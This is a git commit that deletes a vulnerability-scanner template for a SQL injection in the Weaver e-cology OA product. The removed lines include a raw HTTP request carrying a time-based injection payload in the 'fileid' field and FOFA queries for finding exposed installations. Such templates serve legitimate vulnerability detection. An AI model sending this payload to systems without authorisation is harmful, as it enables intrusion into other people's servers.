Delete ecology-oa-filedownloadforoutdoc-sqli.yaml

patch-1
momika233 2023-08-16 00:18:24 +08:00 committed by GitHub
parent 84d8c493e4
commit df5eb2b284
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 31 deletions

View File

@ -1,31 +0,0 @@
id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: momika233
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
reference:
- https://www.secrss.com/articles/56489
metadata:
max-request: 1
verified: true
fofa-query: app.name="泛微 e-cology 9.0 OA"
fofa-query: app.name="泛微 e-cology OA"
requests:
- raw:
- |
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
matchers:
- type: dsl
dsl:
- 'duration>=5'